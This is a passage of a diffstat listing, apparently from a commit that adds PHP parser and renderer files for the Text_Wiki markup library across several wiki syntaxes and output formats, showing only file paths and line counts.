 Text/Wiki/Parse/BBCode/List.php                    |  187 +++
 Text/Wiki/Parse/BBCode/Subscript.php               |   85 ++
 Text/Wiki/Parse/BBCode/Superscript.php             |   84 ++
 Text/Wiki/Parse/BBCode/Underline.php               |   63 +
 Text/Wiki/Parse/BBCode/Url.php                     |  185 +++
 Text/Wiki/Parse/Cowiki/Anchor.php                  |   88 ++
 Text/Wiki/Parse/Cowiki/Blockquote.php              |  180 +++
 Text/Wiki/Parse/Cowiki/Bold.php                    |   79 +
 Text/Wiki/Parse/Cowiki/Break.php                   |   73 +
 Text/Wiki/Parse/Cowiki/Center.php                  |   79 +
 Text/Wiki/Parse/Cowiki/Code.php                    |   99 ++
 Text/Wiki/Parse/Cowiki/Colortext.php               |   90 ++
 Text/Wiki/Parse/Cowiki/Deflist.php                 |  123 ++
 Text/Wiki/Parse/Cowiki/Delimiter.php               |   80 +
 Text/Wiki/Parse/Cowiki/Embed.php                   |  107 ++
 Text/Wiki/Parse/Cowiki/Emphasis.php                |   81 +
 Text/Wiki/Parse/Cowiki/Freelink.php                |   74 +
 Text/Wiki/Parse/Cowiki/Function.php                |  142 ++
 Text/Wiki/Parse/Cowiki/Heading.php                 |  107 ++
 Text/Wiki/Parse/Cowiki/Horiz.php                   |   70 +
 Text/Wiki/Parse/Cowiki/Html.php                    |   76 +
 Text/Wiki/Parse/Cowiki/Image.php                   |   85 ++
 Text/Wiki/Parse/Cowiki/Include.php                 |  100 ++
 Text/Wiki/Parse/Cowiki/Interwiki.php               |  142 ++
 Text/Wiki/Parse/Cowiki/Italic.php                  |   79 +
 Text/Wiki/Parse/Cowiki/List.php                    |  246 +++
 Text/Wiki/Parse/Cowiki/Newline.php                 |   75 +
 Text/Wiki/Parse/Cowiki/Paragraph.php               |  146 ++
 Text/Wiki/Parse/Cowiki/Phplookup.php               |   73 +
 Text/Wiki/Parse/Cowiki/Prefilter.php               |   78 +
 Text/Wiki/Parse/Cowiki/Raw.php                     |   72 +
 Text/Wiki/Parse/Cowiki/Revise.php                  |  170 +++
 Text/Wiki/Parse/Cowiki/Strong.php                  |   85 ++
 Text/Wiki/Parse/Cowiki/Subscript.php               |   79 +
 Text/Wiki/Parse/Cowiki/Superscript.php             |   79 +
 Text/Wiki/Parse/Cowiki/Table.php                   |  214 +++
 Text/Wiki/Parse/Cowiki/Tighten.php                 |   49 +
 Text/Wiki/Parse/Cowiki/Toc.php                     |   93 ++
 Text/Wiki/Parse/Cowiki/Tt.php                      |   84 ++
 Text/Wiki/Parse/Cowiki/Underline.php               |   79 +
 Text/Wiki/Parse/Cowiki/Url.php                     |  281 ++++
 Text/Wiki/Parse/Cowiki/Wikilink.php                |  227 +++
 Text/Wiki/Parse/Creole/Address.php                 |   67 +
 Text/Wiki/Parse/Creole/Blockquote.php              |  176 +++
 Text/Wiki/Parse/Creole/Bold.php                    |   82 +
 Text/Wiki/Parse/Creole/Box.php                     |   81 +
 Text/Wiki/Parse/Creole/Break.php                   |   73 +
 Text/Wiki/Parse/Creole/Center.php                  |   78 +
 Text/Wiki/Parse/Creole/Deflist.php                 |  129 ++
 Text/Wiki/Parse/Creole/Delimiter.php               |   68 +
 Text/Wiki/Parse/Creole/Emphasis.php                |   83 ++
 Text/Wiki/Parse/Creole/Footnote.php                |   83 ++
 Text/Wiki/Parse/Creole/Heading.php                 |   97 ++
 Text/Wiki/Parse/Creole/Horiz.php                   |   58 +
 Text/Wiki/Parse/Creole/Image.php                   |   69 +
 Text/Wiki/Parse/Creole/Italic.php                  |   81 +
 Text/Wiki/Parse/Creole/List.php                    |  244 +++
 Text/Wiki/Parse/Creole/Newline.php                 |   60 +
 Text/Wiki/Parse/Creole/Paragraph.php               |  139 ++
 Text/Wiki/Parse/Creole/Prefilter.php               |   54 +
 Text/Wiki/Parse/Creole/Preformatted.php            |   68 +
 Text/Wiki/Parse/Creole/Raw.php                     |   61 +
 Text/Wiki/Parse/Creole/Strong.php                  |   84 ++
 Text/Wiki/Parse/Creole/Subscript.php               |   75 +
 Text/Wiki/Parse/Creole/Superscript.php             |   75 +
 Text/Wiki/Parse/Creole/Table.php                   |  207 +++
 Text/Wiki/Parse/Creole/Tighten.php                 |   37 +
 Text/Wiki/Parse/Creole/Trim.php                    |   75 +
 Text/Wiki/Parse/Creole/Tt.php                      |   78 +
 Text/Wiki/Parse/Creole/Underline.php               |   83 ++
 Text/Wiki/Parse/Creole/Url.php                     |  109 ++
 Text/Wiki/Parse/Creole/Wikilink.php                |  322 ++++
 Text/Wiki/Parse/Default/Anchor.php                 |   87 ++
 Text/Wiki/Parse/Default/Blockquote.php             |  162 ++
 Text/Wiki/Parse/Default/Bold.php                   |   79 +
 Text/Wiki/Parse/Default/Break.php                  |   72 +
 Text/Wiki/Parse/Default/Center.php                 |   78 +
 Text/Wiki/Parse/Default/Code.php                   |  100 ++
 Text/Wiki/Parse/Default/Colortext.php              |   89 ++
 Text/Wiki/Parse/Default/Deflist.php                |  122 ++
 Text/Wiki/Parse/Default/Delimiter.php              |   97 ++
 Text/Wiki/Parse/Default/Embed.php                  |  106 ++
 Text/Wiki/Parse/Default/Emphasis.php               |   85 ++
 Text/Wiki/Parse/Default/Freelink.php               |  150 ++
 Text/Wiki/Parse/Default/Function.php               |  141 ++
 Text/Wiki/Parse/Default/Heading.php                |  107 ++
 Text/Wiki/Parse/Default/Horiz.php                  |   70 +
 Text/Wiki/Parse/Default/Html.php                   |   75 +
 Text/Wiki/Parse/Default/Image.php                  |  149 ++
 Text/Wiki/Parse/Default/Include.php                |  100 ++
 Text/Wiki/Parse/Default/Interwiki.php              |  138 ++
 Text/Wiki/Parse/Default/Italic.php                 |   85 ++
 Text/Wiki/Parse/Default/List.php                   |  262 ++++
 Text/Wiki/Parse/Default/Newline.php                |   75 +
 Text/Wiki/Parse/Default/Paragraph.php              |  116 ++
 Text/Wiki/Parse/Default/Phplookup.php              |   73 +
 Text/Wiki/Parse/Default/Prefilter.php              |   84 ++
 Text/Wiki/Parse/Default/Raw.php                    |   73 +
 Text/Wiki/Parse/Default/Revise.php                 |  145 ++
 Text/Wiki/Parse/Default/Smiley.php                 |  170 +++
 Text/Wiki/Parse/Default/Strong.php                 |   86 ++
 Text/Wiki/Parse/Default/Subscript.php              |   79 +
 Text/Wiki/Parse/Default/Superscript.php            |   79 +
 Text/Wiki/Parse/Default/Table.php                  |  226 +++
 Text/Wiki/Parse/Default/Tighten.php                |   49 +
 Text/Wiki/Parse/Default/Toc.php                    |  130 ++
 Text/Wiki/Parse/Default/Tt.php                     |   84 ++
 Text/Wiki/Parse/Default/Underline.php              |   79 +
 Text/Wiki/Parse/Default/Url.php                    |  296 ++++
 Text/Wiki/Parse/Default/Wikilink.php               |  222 +++
 Text/Wiki/Parse/Doku/Anchor.php                    |   88 ++
 Text/Wiki/Parse/Doku/Blockquote.php                |  180 +++
 Text/Wiki/Parse/Doku/Bold.php                      |   79 +
 Text/Wiki/Parse/Doku/Break.php                     |   73 +
 Text/Wiki/Parse/Doku/Center.php                    |   79 +
 Text/Wiki/Parse/Doku/Code.php                      |   95 ++
 Text/Wiki/Parse/Doku/Colortext.php                 |   90 ++
 Text/Wiki/Parse/Doku/Deflist.php                   |  123 ++
 Text/Wiki/Parse/Doku/Delimiter.php                 |   80 +
 Text/Wiki/Parse/Doku/Embed.php                     |  107 ++
 Text/Wiki/Parse/Doku/Emphasis.php                  |   85 ++
 Text/Wiki/Parse/Doku/Freelink.php                  |   99 ++
 Text/Wiki/Parse/Doku/Function.php                  |  142 ++
 Text/Wiki/Parse/Doku/Heading.php                   |  107 ++
 Text/Wiki/Parse/Doku/Horiz.php                     |   70 +
 Text/Wiki/Parse/Doku/Html.php                      |   75 +
 Text/Wiki/Parse/Doku/Image.php                     |   99 ++
 Text/Wiki/Parse/Doku/Include.php                   |  101 ++
 Text/Wiki/Parse/Doku/Interwiki.php                 |   96 ++
 Text/Wiki/Parse/Doku/Italic.php                    |   84 ++
 Text/Wiki/Parse/Doku/List.php                      |  248 ++++
 Text/Wiki/Parse/Doku/Newline.php                   |   75 +
 Text/Wiki/Parse/Doku/Paragraph.php                 |  146 ++
 Text/Wiki/Parse/Doku/Phplookup.php                 |   74 +
 Text/Wiki/Parse/Doku/Prefilter.php                 |   78 +
 Text/Wiki/Parse/Doku/Raw.php                       |   87 ++
 Text/Wiki/Parse/Doku/Revise.php                    |  168 +++
 Text/Wiki/Parse/Doku/Strong.php                    |   90 ++
 Text/Wiki/Parse/Doku/Subscript.php                 |   79 +
 Text/Wiki/Parse/Doku/Superscript.php               |   79 +
 Text/Wiki/Parse/Doku/Table.php                     |  240 +++
 Text/Wiki/Parse/Doku/Tighten.php                   |   49 +
 Text/Wiki/Parse/Doku/Toc.php                       |   84 ++
 Text/Wiki/Parse/Doku/Tt.php                        |   84 ++
 Text/Wiki/Parse/Doku/Underline.php                 |   79 +
 Text/Wiki/Parse/Doku/Url.php                       |  326 ++++
 Text/Wiki/Parse/Doku/Wikilink.php                  |  123 ++
 Text/Wiki/Parse/Mediawiki/Break.php                |   59 +
 Text/Wiki/Parse/Mediawiki/Code.php                 |   91 ++
 Text/Wiki/Parse/Mediawiki/Comment.php              |   59 +
 Text/Wiki/Parse/Mediawiki/Deflist.php              |  293 ++++
 Text/Wiki/Parse/Mediawiki/Emphasis.php             |  264 ++++
 Text/Wiki/Parse/Mediawiki/Heading.php              |   94 ++
 Text/Wiki/Parse/Mediawiki/List.php                 |  232 +++
 Text/Wiki/Parse/Mediawiki/Newline.php              |   59 +
 Text/Wiki/Parse/Mediawiki/Preformatted.php         |   72 +
 Text/Wiki/Parse/Mediawiki/Raw.php                  |   61 +
 Text/Wiki/Parse/Mediawiki/Redirect.php             |   77 +
 Text/Wiki/Parse/Mediawiki/Subscript.php            |   65 +
 Text/Wiki/Parse/Mediawiki/Superscript.php          |   65 +
 Text/Wiki/Parse/Mediawiki/Table.php                |  286 ++++
 Text/Wiki/Parse/Mediawiki/Tt.php                   |   71 +
 Text/Wiki/Parse/Mediawiki/Url.php                  |  318 ++++
 Text/Wiki/Parse/Mediawiki/Wikilink.php             |  312 ++++
 Text/Wiki/Parse/Tiki/Anchor.php                    |   89 ++
 Text/Wiki/Parse/Tiki/Blockquote.php                |  181 +++
 Text/Wiki/Parse/Tiki/Bold.php                      |   81 +
 Text/Wiki/Parse/Tiki/Box.php                       |   81 +
 Text/Wiki/Parse/Tiki/Break.php                     |   74 +
 Text/Wiki/Parse/Tiki/Center.php                    |   80 +
 Text/Wiki/Parse/Tiki/Code.php                      |  116 ++
 Text/Wiki/Parse/Tiki/Colortext.php                 |   91 ++
 Text/Wiki/Parse/Tiki/Deflist.php                   |  124 ++
 Text/Wiki/Parse/Tiki/Delimiter.php                 |   82 +
 Text/Wiki/Parse/Tiki/Embed.php                     |  108 ++
 Text/Wiki/Parse/Tiki/Emphasis.php                  |   87 ++
 Text/Wiki/Parse/Tiki/Freelink.php                  |  138 ++
 Text/Wiki/Parse/Tiki/Heading.php                   |  132 ++
 Text/Wiki/Parse/Tiki/Horiz.php                     |   72 +
 Text/Wiki/Parse/Tiki/Html.php                      |   77 +
 Text/Wiki/Parse/Tiki/Image.php                     |  114 ++
 Text/Wiki/Parse/Tiki/Include.php                   |  102 ++
 Text/Wiki/Parse/Tiki/Interwiki.php                 |  140 ++
 Text/Wiki/Parse/Tiki/Italic.php                    |   87 ++
 Text/Wiki/Parse/Tiki/List.php                      |  250 ++++
 Text/Wiki/Parse/Tiki/Newline.php                   |   77 +
 Text/Wiki/Parse/Tiki/Page.php                      |   69 +
 Text/Wiki/Parse/Tiki/Paragraph.php                 |  148 ++
 Text/Wiki/Parse/Tiki/Plugin.php                    |  134 ++
 Text/Wiki/Parse/Tiki/Prefilter.php                 |   80 +
 Text/Wiki/Parse/Tiki/Preformatted.php              |   74 +
 Text/Wiki/Parse/Tiki/Raw.php                       |   74 +
 Text/Wiki/Parse/Tiki/Revise.php                    |  147 ++
 Text/Wiki/Parse/Tiki/Smiley.php                    |   67 +
 Text/Wiki/Parse/Tiki/Specialchar.php               |   73 +
 Text/Wiki/Parse/Tiki/Strong.php                    |   92 ++
 Text/Wiki/Parse/Tiki/Subscript.php                 |   82 +
 Text/Wiki/Parse/Tiki/Superscript.php               |   82 +
 Text/Wiki/Parse/Tiki/Table.php                     |  235 +++
 Text/Wiki/Parse/Tiki/Tighten.php                   |   51 +
 Text/Wiki/Parse/Tiki/Titlebar.php                  |   45 +
 Text/Wiki/Parse/Tiki/Toc.php                       |   82 +
 Text/Wiki/Parse/Tiki/Tt.php                        |   86 ++
 Text/Wiki/Parse/Tiki/Underline.php                 |   81 +
 Text/Wiki/Parse/Tiki/Url.php                       |  293 ++++
 Text/Wiki/Parse/Tiki/Wikilink.php                  |  224 +++
 Text/Wiki/Render.php                               |  234 +++
 Text/Wiki/Render/Cowiki.php                        |   16 +
 Text/Wiki/Render/Cowiki/Anchor.php                 |   23 +
 Text/Wiki/Render/Cowiki/Blockquote.php             |   23 +
 Text/Wiki/Render/Cowiki/Bold.php                   |   23 +
 Text/Wiki/Render/Cowiki/Box.php                    |   33 +
 Text/Wiki/Render/Cowiki/Break.php                  |   24 +
 Text/Wiki/Render/Cowiki/Center.php                 |   23 +
 Text/Wiki/Render/Cowiki/Code.php                   |   23 +
 Text/Wiki/Render/Cowiki/Colortext.php              |   23 +
 Text/Wiki/Render/Cowiki/Deflist.php                |   23 +
 Text/Wiki/Render/Cowiki/Delimiter.php              |   23 +
 Text/Wiki/Render/Cowiki/Embed.php                  |   23 +
 Text/Wiki/Render/Cowiki/Emphasis.php               |   23 +
 Text/Wiki/Render/Cowiki/Freelink.php               |    9 +
 Text/Wiki/Render/Cowiki/Function.php               |   25 +
 Text/Wiki/Render/Cowiki/Heading.php                |   13 +
 Text/Wiki/Render/Cowiki/Horiz.php                  |   23 +
 Text/Wiki/Render/Cowiki/Html.php                   |   23 +
 Text/Wiki/Render/Cowiki/Image.php                  |   23 +
 Text/Wiki/Render/Cowiki/Include.php                |    8 +
 Text/Wiki/Render/Cowiki/Interwiki.php              |   23 +
 Text/Wiki/Render/Cowiki/Italic.php                 |   23 +
 Text/Wiki/Render/Cowiki/List.php                   |   56 +
 Text/Wiki/Render/Cowiki/Newline.php                |   13 +
 Text/Wiki/Render/Cowiki/Paragraph.php              |   23 +
 Text/Wiki/Render/Cowiki/Phplookup.php              |   25 +
 Text/Wiki/Render/Cowiki/Prefilter.php              |   25 +
 Text/Wiki/Render/Cowiki/Raw.php                    |   23 +
 Text/Wiki/Render/Cowiki/Revise.php                 |   36 +
 Text/Wiki/Render/Cowiki/Strong.php                 |   23 +
 Text/Wiki/Render/Cowiki/Subscript.php              |   29 +
 Text/Wiki/Render/Cowiki/Superscript.php            |   29 +
 Text/Wiki/Render/Cowiki/Table.php                  |   55 +
 Text/Wiki/Render/Cowiki/Tighten.php                |   10 +
 Text/Wiki/Render/Cowiki/Toc.php                    |   25 +
 Text/Wiki/Render/Cowiki/Tt.php                     |   29 +
 Text/Wiki/Render/Cowiki/Underline.php              |   23 +
 Text/Wiki/Render/Cowiki/Url.php                    |   45 +
 Text/Wiki/Render/Cowiki/Wikilink.php               |   29 +
 Text/Wiki/Render/Creole.php                        |   16 +
 Text/Wiki/Render/Creole/Address.php                |   29 +
 Text/Wiki/Render/Creole/Anchor.php                 |   23 +
 Text/Wiki/Render/Creole/Blockquote.php             |   47 +
 Text/Wiki/Render/Creole/Bold.php                   |   23 +
 Text/Wiki/Render/Creole/Box.php                    |   30 +
 Text/Wiki/Render/Creole/Break.php                  |   24 +
 Text/Wiki/Render/Creole/Center.php                 |   30 +
 Text/Wiki/Render/Creole/Code.php                   |   23 +
 Text/Wiki/Render/Creole/Colortext.php              |   23 +
 Text/Wiki/Render/Creole/Deflist.php                |   23 +
 Text/Wiki/Render/Creole/Delimiter.php              |   23 +
 Text/Wiki/Render/Creole/Embed.php                  |   29 +
 Text/Wiki/Render/Creole/Emphasis.php               |   23 +
 Text/Wiki/Render/Creole/Freelink.php               |    9 +
 Text/Wiki/Render/Creole/Function.php               |   23 +
 Text/Wiki/Render/Creole/Heading.php                |   16 +
 Text/Wiki/Render/Creole/Horiz.php                  |   23 +
 Text/Wiki/Render/Creole/Html.php                   |   23 +
 Text/Wiki/Render/Creole/Image.php                  |   26 +
 Text/Wiki/Render/Creole/Include.php                |   16 +
 Text/Wiki/Render/Creole/Interwiki.php              |   23 +
 Text/Wiki/Render/Creole/Italic.php                 |   23 +
 Text/Wiki/Render/Creole/List.php                   |   53 +
 Text/Wiki/Render/Creole/Newline.php                |   12 +
 Text/Wiki/Render/Creole/Paragraph.php              |   29 +
 Text/Wiki/Render/Creole/Phplookup.php              |   25 +
 Text/Wiki/Render/Creole/Prefilter.php              |   10 +
 Text/Wiki/Render/Creole/Preformatted.php           |   27 +
 Text/Wiki/Render/Creole/Raw.php                    |   33 +
 Text/Wiki/Render/Creole/Revise.php                 |   23 +
 Text/Wiki/Render/Creole/Strong.php                 |   23 +
 Text/Wiki/Render/Creole/Subscript.php              |   23 +
 Text/Wiki/Render/Creole/Superscript.php            |   23 +
 Text/Wiki/Render/Creole/Table.php                  |   70 +
 Text/Wiki/Render/Creole/Tighten.php                |   10 +
 Text/Wiki/Render/Creole/Toc.php                    |   23 +
 Text/Wiki/Render/Creole/Tt.php                     |   29 +
 Text/Wiki/Render/Creole/Underline.php              |   23 +
 Text/Wiki/Render/Creole/Url.php                    |   40 +
 Text/Wiki/Render/Creole/Wikilink.php               |   43 +
 Text/Wiki/Render/Docbook.php                       |   45 +
 Text/Wiki/Render/Docbook/Anchor.php                |   40 +
 Text/Wiki/Render/Docbook/Blockquote.php            |   53 +
 Text/Wiki/Render/Docbook/Bold.php                  |   54 +
 Text/Wiki/Render/Docbook/Box.php                   |   54 +
 Text/Wiki/Render/Docbook/Break.php                 |   47 +
 Text/Wiki/Render/Docbook/Center.php                |   51 +
 Text/Wiki/Render/Docbook/Code.php                  |   52 +
 Text/Wiki/Render/Docbook/Colortext.php             |   80 +
 Text/Wiki/Render/Docbook/Deflist.php               |   75 +
 Text/Wiki/Render/Docbook/Delimiter.php             |   46 +
 Text/Wiki/Render/Docbook/Embed.php                 |   47 +
 Text/Wiki/Render/Docbook/Emphasis.php              |   55 +
 Text/Wiki/Render/Docbook/Font.php                  |   59 +
 Text/Wiki/Render/Docbook/Freelink.php              |   35 +
 Text/Wiki/Render/Docbook/Function.php              |   73 +
 Text/Wiki/Render/Docbook/Heading.php               |  201 +++
 Text/Wiki/Render/Docbook/Horiz.php                 |   46 +
 Text/Wiki/Render/Docbook/Html.php                  |   48 +
 Text/Wiki/Render/Docbook/Image.php                 |  180 +++
 Text/Wiki/Render/Docbook/Include.php               |   32 +
 Text/Wiki/Render/Docbook/Interwiki.php             |   80 +
 Text/Wiki/Render/Docbook/Italic.php                |   54 +
 Text/Wiki/Render/Docbook/List.php                  |   95 ++
 Text/Wiki/Render/Docbook/Newline.php               |   34 +
 Text/Wiki/Render/Docbook/Page.php                  |   46 +
 Text/Wiki/Render/Docbook/Paragraph.php             |   49 +
 Text/Wiki/Render/Docbook/Phplookup.php             |   59 +
 Text/Wiki/Render/Docbook/Plugin.php                |   47 +
 Text/Wiki/Render/Docbook/Prefilter.php             |   34 +
 Text/Wiki/Render/Docbook/Preformatted.php          |   46 +
 Text/Wiki/Render/Docbook/Raw.php                   |   45 +
 Text/Wiki/Render/Docbook/Revise.php                |   61 +
 Text/Wiki/Render/Docbook/Smiley.php                |   74 +
 Text/Wiki/Render/Docbook/Specialchar.php           |   52 +
 Text/Wiki/Render/Docbook/Strong.php                |   54 +
 Text/Wiki/Render/Docbook/Subscript.php             |   49 +
 Text/Wiki/Render/Docbook/Superscript.php           |   49 +
 Text/Wiki/Render/Docbook/Table.php                 |  140 ++
 Text/Wiki/Render/Docbook/Tighten.php               |   34 +
 Text/Wiki/Render/Docbook/Titlebar.php              |   57 +
 Text/Wiki/Render/Docbook/Toc.php                   |  115 ++
 Text/Wiki/Render/Docbook/Tt.php                    |   49 +
 Text/Wiki/Render/Docbook/Underline.php             |   54 +
 Text/Wiki/Render/Docbook/Url.php                   |  125 ++
 Text/Wiki/Render/Docbook/Wikilink.php              |  160 ++
 Text/Wiki/Render/Doku.php                          |   16 +
 Text/Wiki/Render/Doku/Anchor.php                   |   33 +
 Text/Wiki/Render/Doku/Blockquote.php               |   37 +
 Text/Wiki/Render/Doku/Bold.php                     |   23 +
 Text/Wiki/Render/Doku/Box.php                      |   34 +
 Text/Wiki/Render/Doku/Break.php                    |   24 +
 Text/Wiki/Render/Doku/Center.php                   |   29 +
 Text/Wiki/Render/Doku/Code.php                     |   23 +
 Text/Wiki/Render/Doku/Colortext.php                |   52 +
 Text/Wiki/Render/Doku/Deflist.php                  |   23 +
 Text/Wiki/Render/Doku/Delimiter.php                |   23 +
 Text/Wiki/Render/Doku/Embed.php                    |   23 +
 Text/Wiki/Render/Doku/Emphasis.php                 |   23 +
 Text/Wiki/Render/Doku/Freelink.php                 |    9 +
 Text/Wiki/Render/Doku/Function.php                 |   70 +
 Text/Wiki/Render/Doku/Heading.php                  |   11 +
 Text/Wiki/Render/Doku/Horiz.php                    |   23 +
 Text/Wiki/Render/Doku/Html.php                     |   23 +
 Text/Wiki/Render/Doku/Image.php                    |   39 +
 Text/Wiki/Render/Doku/Include.php                  |    8 +
 Text/Wiki/Render/Doku/Interwiki.php                |   23 +
 Text/Wiki/Render/Doku/Italic.php                   |   23 +
 Text/Wiki/Render/Doku/List.php                     |   56 +
 Text/Wiki/Render/Doku/Newline.php                  |   13 +
 Text/Wiki/Render/Doku/Paragraph.php                |   23 +
 Text/Wiki/Render/Doku/Phplookup.php                |   25 +
 Text/Wiki/Render/Doku/Prefilter.php                |   25 +
 Text/Wiki/Render/Doku/Raw.php                      |   23 +
 Text/Wiki/Render/Doku/Revise.php                   |   36 +
 Text/Wiki/Render/Doku/Strong.php                   |   23 +
 Text/Wiki/Render/Doku/Subscript.php                |   29 +
 Text/Wiki/Render/Doku/Superscript.php              |   29 +
 Text/Wiki/Render/Doku/Table.php                    |   96 ++
 Text/Wiki/Render/Doku/Tighten.php                  |   10 +
 Text/Wiki/Render/Doku/Toc.php                      |   26 +
 Text/Wiki/Render/Doku/Tt.php                       |   29 +
 Text/Wiki/Render/Doku/Underline.php                |   23 +
 Text/Wiki/Render/Doku/Url.php                      |   52 +
 Text/Wiki/Render/Doku/Wikilink.php                 |   33 +
 Text/Wiki/Render/Latex.php                         |   90 ++
 Text/Wiki/Render/Latex/Anchor.php                  |   33 +
 Text/Wiki/Render/Latex/Blockquote.php              |   36 +
 Text/Wiki/Render/Latex/Bold.php                    |   28 +
 Text/Wiki/Render/Latex/Box.php                     |   54 +
 Text/Wiki/Render/Latex/Break.php                   |   24 +
 Text/Wiki/Render/Latex/Center.php                  |   33 +
 Text/Wiki/Render/Latex/Code.php                    |   26 +
 Text/Wiki/Render/Latex/Colortext.php               |   58 +
 Text/Wiki/Render/Latex/Deflist.php                 |   53 +
 Text/Wiki/Render/Latex/Delimiter.php               |   25 +
 Text/Wiki/Render/Latex/Embed.php                   |   23 +
 Text/Wiki/Render/Latex/Emphasis.php                |   29 +
 Text/Wiki/Render/Latex/Font.php                    |   73 +
 Text/Wiki/Render/Latex/Freelink.php                |    8 +
 Text/Wiki/Render/Latex/Function.php                |   23 +
 Text/Wiki/Render/Latex/Heading.php                 |   33 +
 Text/Wiki/Render/Latex/Horiz.php                   |   23 +
 Text/Wiki/Render/Latex/Html.php                    |   25 +
 Text/Wiki/Render/Latex/Image.php                   |   70 +
 Text/Wiki/Render/Latex/Include.php                 |    8 +
 Text/Wiki/Render/Latex/Interwiki.php               |   58 +
 Text/Wiki/Render/Latex/Italic.php                  |   28 +
 Text/Wiki/Render/Latex/List.php                    |   76 +
 Text/Wiki/Render/Latex/Newline.php                 |   12 +
 Text/Wiki/Render/Latex/Page.php                    |   48 +
 Text/Wiki/Render/Latex/Paragraph.php               |   31 +
 Text/Wiki/Render/Latex/Phplookup.php               |   34 +
 Text/Wiki/Render/Latex/Plugin.php                  |   49 +
 Text/Wiki/Render/Latex/Prefilter.php               |   24 +
 Text/Wiki/Render/Latex/Preformatted.php            |   48 +
 Text/Wiki/Render/Latex/Raw.php                     |   23 +
 Text/Wiki/Render/Latex/Revise.php                  |   38 +
 Text/Wiki/Render/Latex/Smiley.php                  |   44 +
 Text/Wiki/Render/Latex/Specialchar.php             |   54 +
 Text/Wiki/Render/Latex/Strong.php                  |   30 +
 Text/Wiki/Render/Latex/Subscript.php               |   54 +
 Text/Wiki/Render/Latex/Superscript.php             |   31 +
 Text/Wiki/Render/Latex/Table.php                   |   99 ++
 Text/Wiki/Render/Latex/Tighten.php                 |    9 +
 Text/Wiki/Render/Latex/Titlebar.php                |   54 +
 Text/Wiki/Render/Latex/Toc.php                     |   30 +
 Text/Wiki/Render/Latex/Tt.php                      |   30 +
 Text/Wiki/Render/Latex/Underline.php               |   30 +
 Text/Wiki/Render/Latex/Url.php                     |   41 +
 Text/Wiki/Render/Latex/Wikilink.php                |   63 +
 Text/Wiki/Render/Plain.php                         |   16 +
 Text/Wiki/Render/Plain/Anchor.php                  |   23 +
 Text/Wiki/Render/Plain/Blockquote.php              |   39 +
 Text/Wiki/Render/Plain/Bold.php                    |   23 +
 Text/Wiki/Render/Plain/Box.php                     |   48 +
 Text/Wiki/Render/Plain/Break.php                   |   24 +
 Text/Wiki/Render/Plain/Center.php                  |   23 +
 Text/Wiki/Render/Plain/Code.php                    |   24 +
 Text/Wiki/Render/Plain/Colortext.php               |   23 +
 Text/Wiki/Render/Plain/Deflist.php                 |   59 +
 Text/Wiki/Render/Plain/Delimiter.php               |   23 +
 Text/Wiki/Render/Plain/Embed.php                   |   23 +
 Text/Wiki/Render/Plain/Emphasis.php                |   23 +
 Text/Wiki/Render/Plain/Font.php                    |   44 +
 Text/Wiki/Render/Plain/Freelink.php                |   23 +
 Text/Wiki/Render/Plain/Function.php                |   39 +
 Text/Wiki/Render/Plain/Heading.php                 |   14 +
 Text/Wiki/Render/Plain/Horiz.php                   |   23 +
 Text/Wiki/Render/Plain/Html.php                    |   24 +
 Text/Wiki/Render/Plain/Image.php                   |   22 +
 Text/Wiki/Render/Plain/Include.php                 |    8 +
 Text/Wiki/Render/Plain/Interwiki.php               |   29 +
 Text/Wiki/Render/Plain/Italic.php                  |   23 +
 Text/Wiki/Render/Plain/List.php                    |   68 +
 Text/Wiki/Render/Plain/Newline.php                 |   12 +
 Text/Wiki/Render/Plain/Page.php                    |   48 +
 Text/Wiki/Render/Plain/Paragraph.php               |   31 +
 Text/Wiki/Render/Plain/Phplookup.php               |   25 +
 Text/Wiki/Render/Plain/Plugin.php                  |   49 +
 Text/Wiki/Render/Plain/Prefilter.php               |   24 +
 Text/Wiki/Render/Plain/Preformatted.php            |   48 +
 Text/Wiki/Render/Plain/Raw.php                     |   23 +
 Text/Wiki/Render/Plain/Revise.php                  |   24 +
 Text/Wiki/Render/Plain/Smiley.php                  |   44 +
 Text/Wiki/Render/Plain/Specialchar.php             |   54 +
 Text/Wiki/Render/Plain/Strong.php                  |   24 +
 Text/Wiki/Render/Plain/Subscript.php               |   48 +
 Text/Wiki/Render/Plain/Superscript.php             |   23 +
 Text/Wiki/Render/Plain/Table.php                   |   65 +
 Text/Wiki/Render/Plain/Tighten.php                 |   10 +
 Text/Wiki/Render/Plain/Titlebar.php                |   54 +
 Text/Wiki/Render/Plain/Toc.php                     |   39 +
 Text/Wiki/Render/Plain/Tt.php                      |   24 +
 Text/Wiki/Render/Plain/Underline.php               |   23 +
 Text/Wiki/Render/Plain/Url.php                     |   29 +
 Text/Wiki/Render/Plain/Wikilink.php                |   24 +
 Text/Wiki/Render/Tiki.php                          |   16 +
 Text/Wiki/Render/Tiki/Anchor.php                   |   29 +
 Text/Wiki/Render/Tiki/Blockquote.php               |   35 +
 Text/Wiki/Render/Tiki/Bold.php                     |   23 +
 Text/Wiki/Render/Tiki/Box.php                      |   29 +
 Text/Wiki/Render/Tiki/Break.php                    |   24 +
 Text/Wiki/Render/Tiki/Center.php                   |   29 +
 Text/Wiki/Render/Tiki/Code.php                     |   27 +
 Text/Wiki/Render/Tiki/Colortext.php                |   52 +
 Text/Wiki/Render/Tiki/Deflist.php                  |   68 +
 Text/Wiki/Render/Tiki/Delimiter.php                |   23 +
 Text/Wiki/Render/Tiki/Embed.php                    |   23 +
 Text/Wiki/Render/Tiki/Emphasis.php                 |   23 +
 Text/Wiki/Render/Tiki/Freelink.php                 |    9 +
 Text/Wiki/Render/Tiki/Function.php                 |   70 +
 Text/Wiki/Render/Tiki/Heading.php                  |   13 +
 Text/Wiki/Render/Tiki/Horiz.php                    |   23 +
 Text/Wiki/Render/Tiki/Html.php                     |   23 +
 Text/Wiki/Render/Tiki/Image.php                    |   42 +
 Text/Wiki/Render/Tiki/Include.php                  |    8 +
 Text/Wiki/Render/Tiki/Interwiki.php                |   23 +
 Text/Wiki/Render/Tiki/Italic.php                   |   23 +
 Text/Wiki/Render/Tiki/List.php                     |   51 +
 Text/Wiki/Render/Tiki/Newline.php                  |   12 +
 Text/Wiki/Render/Tiki/Paragraph.php                |   27 +
 Text/Wiki/Render/Tiki/Phplookup.php                |   25 +
 Text/Wiki/Render/Tiki/Prefilter.php                |   25 +
 Text/Wiki/Render/Tiki/Preformatted.php             |   48 +
 Text/Wiki/Render/Tiki/Raw.php                      |   23 +
 Text/Wiki/Render/Tiki/Redirect.php                 |   42 +
 Text/Wiki/Render/Tiki/Revise.php                   |   37 +
 Text/Wiki/Render/Tiki/Strong.php                   |   23 +
